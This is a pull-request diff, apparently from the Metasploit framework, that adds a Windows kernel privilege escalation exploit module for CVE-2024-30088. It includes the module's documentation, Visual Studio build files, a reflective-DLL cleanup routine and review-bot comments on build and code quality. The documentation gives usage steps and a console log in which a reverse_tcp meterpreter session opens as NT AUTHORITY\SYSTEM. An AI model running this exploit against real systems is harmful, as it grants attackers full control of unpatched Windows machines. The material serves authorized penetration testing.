Land #19345, Post module Windows LPE CVE-2024-30088
Showing
12 changed files
with
817 additions
and
1 deletion.
Binary file not shown.
56 changes: 56 additions & 0 deletions
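--- a/documentation/modules/exploit/windows/local/cve_2024_30088_authz_basep.md
+++ b/documentation/modules/exploit/windows/local/cve_2024_30088_authz_basep.md
@@ -0,0 +1,56 @@
+## Vulnerable Application
+CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,
+Windows 11 and Windows Server 2022.
+
+The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when
+the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the
+kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure
+directly to the user supplied pointed. It then calls `RtlCopyUnicodeString` and
+`AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading
+to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.
+
+### Setup
+
+Windows 10 22H2 versions without the patch (before 10.0.19045.4529) are vulnerable out of the box.
+This exploit module has been tested on Windows 10 version 22H2 build 19045.2965.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a user level session on an affected Windows machine
+1. Do: `use windows/local/cve_2024_30038_authz_basep`
+1. Set the `LHOST`, `LPORT`, and `SESSION` options
+1. Run the module
+1. Receive a session running in the context of the `NT AUTHORITY\SYSTEM` user.
+
+## Scenarios
+### Windows 10 (10.0 Build 19045.2965)
+```
+msf6 > use windows/local/cve_2024_30038_authz_basep
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/local/cve_2024_30038_authz_basep) > set session -1
+session => -1
+msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit
+[*] Started reverse TCP handler on 172.16.199.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
+[*] Reflectively injecting the DLL into 696...
+[+] The exploit was successful, reading SYSTEM token from memory...
+[+] Successfully stole winlogon handle: 3432
+[+] Successfully retrieved winlogon pid: 452
+[*] Sending stage (201798 bytes) to 172.16.199.208
+[*] Meterpreter session 18 opened (172.16.199.1:5555 -> 172.16.199.208:52890) at 2024-08-30 12:45:49 -0700
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer : DESKTOP-FGNRA7E
+OS : Windows 10 (10.0 Build 19045).
+Architecture : x64
+System Language : en_US
+Domain : WORKGROUP
+Logged On Users : 2
+Meterpreter : x64/windows
+meterpreter >
+```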
31 changes: 31 additions & 0 deletions
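--- a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/CVE-2024-30088.sln
+++ b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/CVE-2024-30088.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.9.34728.123
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2024-30088", "CVE-2024-30088.vcxproj", "{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Debug|x64 = Debug|x64
+Debug|x86 = Debug|x86
+Release|x64 = Release|x64
+Release|x86 = Release|x86
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Debug|x64.ActiveCfg = Debug|x64
+{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Debug|x64.Build.0 = Debug|x64
+{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Debug|x86.ActiveCfg = Debug|Win32
+{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Debug|x86.Build.0 = Debug|Win32
+{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Release|x64.ActiveCfg = Release|x64
+{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Release|x64.Build.0 = Release|x64
+{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Release|x86.ActiveCfg = Release|Win32
+{160B76BB-CC55-4229-9C3B-5EBD0FFED32C}.Release|x86.Build.0 = Release|Win32
+EndGlobalSection
+GlobalSection(SolutionProperties) = preSolution
+HideSolutionNode = FALSE
+EndGlobalSection
+GlobalSection(ExtensibilityGlobals) = postSolution
+SolutionGuid = {E06D4ED0-8938-4E66-8429-9C6EC7B18D4D}
+EndGlobalSection
+EndGlobal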
235 changes: 235 additions & 0 deletions
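--- a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/CVE-2024-30088.vcxproj
+++ b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/CVE-2024-30088.vcxproj
@@ -0,0 +1,235 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Debug|Win32">
+<Configuration>Debug</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Debug|x64">
+<Configuration>Debug</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|x64">
+<Configuration>Release</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<VCProjectVersion>16.0</VCProjectVersion>
+<ProjectGuid>{160b76bb-cc55-4229-9c3b-5ebd0ffed32c}</ProjectGuid>
+<Keyword>Win32Proj</Keyword>
+<RootNamespace>CVE_2024_30088</RootNamespace>
+<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v142</PlatformToolset>
+<CharacterSet>MultiByte</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v142</PlatformToolset>
+<WholeProgramOptimization>false</WholeProgramOptimization>
+<CharacterSet>MultiByte</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v142</PlatformToolset>
+<CharacterSet>MultiByte</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v142</PlatformToolset>
+<WholeProgramOptimization>false</WholeProgramOptimization>
+<CharacterSet>MultiByte</CharacterSet>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<ImportGroup Label="ExtensionSettings">
+</ImportGroup>
+<ImportGroup Label="Shared">
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<PropertyGroup Label="UserMacros" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<LinkIncremental>true</LinkIncremental>
+<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<LinkIncremental>true</LinkIncremental>
+<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<LinkIncremental>false</LinkIncremental>
+<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+<GenerateManifest>false</GenerateManifest>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<LinkIncremental>false</LinkIncremental>
+<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
+<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
+<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+<GenerateManifest>false</GenerateManifest>
+</PropertyGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<ClCompile>
+<PrecompiledHeader>NotUsing</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<SDLCheck>true</SDLCheck>
+<PreprocessorDefinitions>WIN32;_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<ConformanceMode>false</ConformanceMode>
+<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
+<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+<TreatWarningAsError>true</TreatWarningAsError>
+<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+<StringPooling>true</StringPooling>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+<FunctionLevelLinking>false</FunctionLevelLinking>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<EnableUAC>false</EnableUAC>
+<GenerateMapFile>true</GenerateMapFile>
+<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
+<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+<RandomizedBaseAddress>false</RandomizedBaseAddress>
+<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
+<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<ClCompile>
+<PrecompiledHeader>NotUsing</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<SDLCheck>true</SDLCheck>
+<PreprocessorDefinitions>_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<ConformanceMode>false</ConformanceMode>
+<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
+<AdditionalIncludeDirectories>C:\Users\msfuser\Documents\git\metasploit-framework\external\source\include\windows;..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+<TreatWarningAsError>false</TreatWarningAsError>
+<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+<StringPooling>true</StringPooling>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+<FunctionLevelLinking>false</FunctionLevelLinking>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<EnableUAC>false</EnableUAC>
+<GenerateMapFile>true</GenerateMapFile>
+<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
+<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+<RandomizedBaseAddress>false</RandomizedBaseAddress>
+<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
+<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<ClCompile>
+<PrecompiledHeader>NotUsing</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<FunctionLevelLinking>false</FunctionLevelLinking>
+<IntrinsicFunctions>false</IntrinsicFunctions>
+<SDLCheck>
+</SDLCheck>
+<PreprocessorDefinitions>WIN32;NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<ConformanceMode>false</ConformanceMode>
+<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
+<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+<TreatWarningAsError>true</TreatWarningAsError>
+<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+<StringPooling>true</StringPooling>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+<ObjectFileName>$(OutDir)\</ObjectFileName>
+<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+<GenerateDebugInformation>false</GenerateDebugInformation>
+<EnableUAC>false</EnableUAC>
+<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+<GenerateMapFile>false</GenerateMapFile>
+<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
+<RandomizedBaseAddress>false</RandomizedBaseAddress>
+<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<ClCompile>
+<PrecompiledHeader>NotUsing</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<FunctionLevelLinking>false</FunctionLevelLinking>
+<IntrinsicFunctions>false</IntrinsicFunctions>
+<SDLCheck>
+</SDLCheck>
+<PreprocessorDefinitions>NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<ConformanceMode>false</ConformanceMode>
+<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
+<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+<TreatWarningAsError>true</TreatWarningAsError>
+<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+<StringPooling>true</StringPooling>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+<ObjectFileName>$(OutDir)\</ObjectFileName>
+<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+</ClCompile>
+<Link>
+<SubSystem>Windows</SubSystem>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+<GenerateDebugInformation>false</GenerateDebugInformation>
+<EnableUAC>false</EnableUAC>
+<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+<GenerateMapFile>false</GenerateMapFile>
+<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
+<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
+<RandomizedBaseAddress>false</RandomizedBaseAddress>
+<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
+</Link>
+</ItemDefinitionGroup>
+<ItemGroup>
+<ClCompile Include="dllmain.c" />
+<ClCompile Include="exploit.c" />
+<ClCompile Include="ReflectiveFreeAndExitThread.c" />
+</ItemGroup>
+<ItemGroup>
+<ClInclude Include="exploit.h" />
+<ClInclude Include="ReflectiveFreeAndExitThread.h" />
+</ItemGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ImportGroup Label="ExtensionTargets">
+</ImportGroup>
+</Project>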
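Review bot: The Debug|x64 AdditionalIncludeDirectories entry hard-codes `C:\Users\msfuser\Documents\git\metasploit-framework\external\source\include\windows`, a path from one developer's machine that also records a local username, while the other three configurations list only the relative ReflectiveDLLInjection directories, so a Debug|x64 build on any other checkout either fails or silently resolves different headers. Since the project sits under external/source/exploits/CVE-2024-30088/CVE-2024-30088/, that directory is reachable as `..\..\..\include\windows` (derived from the two paths on this page; confirm against the tree), and it should be added to every configuration or dropped if nothing includes from it. The same configuration also sets `<TreatWarningAsError>false</TreatWarningAsError>` where Debug|Win32 and both Release builds keep it true, which reads as a leftover from local debugging rather than an intended per-platform difference.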
48 changes: 48 additions & 0 deletions
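--- a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
+++ b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
@@ -0,0 +1,48 @@
+#include "ReflectiveFreeAndExitThread.h"
+
+typedef NTSTATUS
+(*NtQueueApcThread)(
+HANDLE ThreadHandle,
+PVOID ApcRoutine,
+ULONG_PTR SystemArgument1,
+ULONG_PTR SystemArgument2,
+ULONG_PTR SystemArgument3
+);
+
+VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode) {
+NtQueueApcThread pNtQueueApcThread = (NtQueueApcThread)GetProcAddress(GetModuleHandle(TEXT("ntdll")), "NtQueueApcThread");
+HANDLE hThread = NULL;
+HANDLE hThisThread = NULL;
+
+do {
+if (!pNtQueueApcThread)
+break;
+
+// create a suspended thread that will just exit once the APCs have executed
+hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExitThread, 0, CREATE_SUSPENDED, NULL);
+if (!hThread)
+break;
+
+// open a real handle to this thread to pass in the APC so it operates on this thread and not itself
+hThisThread = OpenThread(THREAD_QUERY_INFORMATION | SYNCHRONIZE, FALSE, GetCurrentThreadId());
+if (!hThisThread)
+break;
+
+// tell that thread to wait on this thread, ensures VirtualFree isn't called until this thread has exited
+pNtQueueApcThread(hThread, WaitForSingleObjectEx, (ULONG_PTR)hThisThread, INFINITE, FALSE);
+
+// then close the handle so it's not leaked
+QueueUserAPC((PAPCFUNC)CloseHandle, hThread, (ULONG_PTR)hThisThread);
+
+// then free the memory
+pNtQueueApcThread(hThread, VirtualFree, (ULONG_PTR)hAppInstance, 0, MEM_RELEASE);
+
+ResumeThread(hThread);
+} while (FALSE);
+
+if (hThread)
+CloseHandle(hThread);
+
+ExitThread(dwExitCode);
+return;
+}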
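Review bot: Neither NtQueueApcThread call's NTSTATUS is checked, and their order is what keeps this routine safe: if queuing the WaitForSingleObjectEx APC fails but the VirtualFree APC is queued, the helper thread releases the module at hAppInstance while the calling thread is still executing inside it. The first call should abort the sequence on a failed status (`< 0`, i.e. not NT_SUCCESS) before VirtualFree is queued; a failure of the second call only leaves the module mapped, which is the harmless direction. Independently, every `break` taken after CreateThread closes hThread without resuming it, so a suspended thread lingers for the life of the process; resuming it on every path is safe because with no APCs queued it simply runs its ExitThread start routine, and hThisThread should be closed on the new failure path so it is not leaked. The `return;` after ExitThread is unreachable, and the typedef named NtQueueApcThread shares its name with the ntdll export it points at — a `P`-prefixed or `_t` name would be conventional and avoids confusing readers.
```c
    do {
        // … unchanged: NtQueueApcThread lookup, CreateThread, OpenThread …

        // the wait APC must be queued before VirtualFree, otherwise the helper thread
        // could release this module while the current thread is still executing inside it
        if (pNtQueueApcThread(hThread, WaitForSingleObjectEx, (ULONG_PTR)hThisThread, INFINITE, FALSE) < 0) {
            CloseHandle(hThisThread);
            break;
        }

        // then close the handle so it's not leaked
        QueueUserAPC((PAPCFUNC)CloseHandle, hThread, (ULONG_PTR)hThisThread);

        // then free the memory; if this fails the module stays mapped, which is the safe failure mode
        pNtQueueApcThread(hThread, VirtualFree, (ULONG_PTR)hAppInstance, 0, MEM_RELEASE);
    } while (FALSE);

    // resume on every path so a thread created above never stays suspended; with no APCs queued it just exits
    if (hThread) {
        ResumeThread(hThread);
        CloseHandle(hThread);
    }

    ExitThread(dwExitCode);
```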
8 changes: 8 additions & 0 deletions
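--- a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.h
+++ b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.h
@@ -0,0 +1,8 @@
+#ifndef _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H
+#define _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H
+
+#include <windows.h>
+
+VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode);
+
+#endif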
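Review bot: The include guard `_METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H` begins with an underscore followed by an uppercase letter, an identifier form the C standard reserves for the implementation, so it can in principle collide with compiler or SDK macros. Dropping the leading underscore (`METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H`) or using `#pragma once`, which MSVC supports, avoids that. The guard name also still says METERPRETER although the header lives under the CVE-2024-30088 exploit tree; it looks carried over from elsewhere, and a one-line comment such as `/* Shared with the meterpreter reflective-DLL sources; keep in sync */` would tell the next maintainer whether that is intentional — confirm the origin before writing it.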